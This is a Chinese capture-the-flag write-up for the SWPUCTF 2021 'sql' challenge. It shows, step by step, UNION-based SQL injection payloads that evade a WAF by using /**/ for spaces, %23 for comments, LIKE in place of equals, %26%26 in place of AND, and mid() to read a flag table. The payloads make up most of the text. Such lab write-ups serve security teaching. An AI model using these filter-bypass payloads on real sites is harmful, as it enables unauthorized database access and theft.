[SWPUCTF 2021 新生赛]sql

妙尽璇机2024-01-01 20:59

[SWPUCTF 2021 新生赛]sql wp

输入 1 正常回显:
复制代码 
?wllm=1
返回:
Want Me? Cross the Waf
Your Login name:xxx
Your Password:yyy
输入单引号引发报错:
复制代码 
?wllm=1'
返回:
Want Me? Cross the Waf
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1
group by 测试回显行数:
复制代码 
1' group by 3#

触发了 waf :

可能是过滤了空格,也可能是 group by 关键字,还可能是注释符。一个一个测:

输入: ?wllm=1 1 ,触发 waf ,说明空格被过滤,使用 /**/ 替换空格: ?wllm=1/**/1 ,成功回显。

除此之外常被用来替换空格的还有:

复制代码 
%20
%09
%0A(%0a)
%0C(%0c)
%0D(%0d)
%0B(%ob)
%A0(%a0)

输入:?wllm=group/**/by ,正常回显,说明该关键字没有被过滤。

使用 /**/ 替换空格,再次用 group by 测试列数:

输入:

复制代码 
?wllm=1'/**/group/**/by/**/2#

引发报错:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 0,1' at line 1

说明 # 被过滤,尝试其他注释符:----+ ,%23(#的URL编码)。最后只有 %23 可以用:

复制代码 
?wllm=1'/**/group/**/by/**/2%23

经过测试,共有 3 列。

select 查询回显位

由于开头的 1 会干扰回显,所以这里去掉1(或者换成负数也行):

复制代码 
?wllm='/**/union/**/select/**/1,2,3%23

经过测试,回显位为后两位。

select 查询数据库
复制代码 
?wllm='/**/union/**/select/**/1,2,database()%23

数据库名称为:test_db

select 查询表名:
复制代码 
?wllm='/**/union/**/select/**/1,2,table_name/**/from/**/information_schema.tables/**/where/**/table_schema=test_db%23

但是触发了 waf ,一开始我以为是 information_schema 被过滤了,经过测试,是等号被过滤了。

用 like 关键字可以替换等号,比如:table_schema=ctf 可以写成 table_schema like 'ctf'

用 like 替换等号查询表名:
复制代码 
?wllm='/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23

成功回显,LTLT_flag 就是要找的表名。

select 查询列名:
复制代码 
?wllm='/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'test_db'/**/and/**/table_name/**/like/**/'LTLT_flag'%23

但是被 waf 了,猜测是 and 出问题了。尝试了大小写,&& 替换 and 都不行,最后用 %26%26 成功绕过。

%26 就是 & 的 URL 编码。

用 %26%26 替换 and 查询列名:
复制代码 
?wllm='/**/union/**/select/**/1,2,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema/**/like/**/'test_db'/**/%26%26/**/table_name/**/like/**/'LTLT_flag'%23

成功回显:

select 查询 flag 列的内容:
复制代码 
?wllm='/**/union/**/select/**/1,2,flag/**/from/**/LTLT_flag%23

出来了但没完全出来:

这里看了下大佬的 wp ,substr,substring 都被过滤了,说用 mid 函数分段读取。

mid 函数分段读取 flag :

读取第一段:

复制代码 
?wllm='/**/union/**/select/**/1,2,mid(flag,1,20)/**/from/**/LTLT_flag%23

读取第二段:

复制代码 
?wllm='/**/union/**/select/**/1,2,mid(flag,21,40)/**/from/**/LTLT_flag%23

读取第三段:

复制代码 
?wllm='/**/union/**/select/**/1,2,mid(flag,41,60)/**/from/**/LTLT_flag%23

经过拼接,得到了一个完整的 flag 。

相关推荐
其实防守也摸鱼7 分钟前
ctfshow--Crypto(funnyrsa1-密码2)解题步骤
python·安全·web安全·网络安全·密码学·web·工具
夏天测2 小时前
2026 年 5 月中旬网络安全深度预警:高危漏洞集中爆发、零日攻击常态化,企业面临多重安全挑战
安全·web安全
QCzblack2 小时前
文件上传upload
web安全
Full Stack Developme3 小时前
SQL发展历史
数据库·sql
汤愈韬3 小时前
hcip-security_防火墙高可靠技术3_防火墙链路高可靠技术
网络·网络协议·网络安全
zcn1263 小时前
关于非相关子查询改写经验
数据库·sql·sql优化改写
今天也是元气满满的一天呢4 小时前
详解SQL注入问题
网络·数据库·sql
晓梦林4 小时前
HiddenGate靶场学习笔记
笔记·安全·web安全
omenkk74 小时前
【MySQL专题】1.一条更新SQL语句是如何执行的
数据库·sql·mysql
X7x55 小时前
网络入侵检测系统(NIDS):企业网络安全的守望者
网络安全·网络攻击模型·安全威胁分析·安全架构·nids
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03Gemini大升级、AI眼镜首发、Android XR亮相,13天后见分晓04【AI】2026 年具身智能模型和世界模型总结05Codex 手机端连接教程:三分钟搞定,附完整步骤06人工智能最新动态 AI 日报 · 2026年5月10日07CC-Switch & Claude 基于 Linux 服务器安装使用指南08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09几个好用的ip纯净度检测网站102026年AI前瞻:量子AI、具身智能与科学发现的新纪元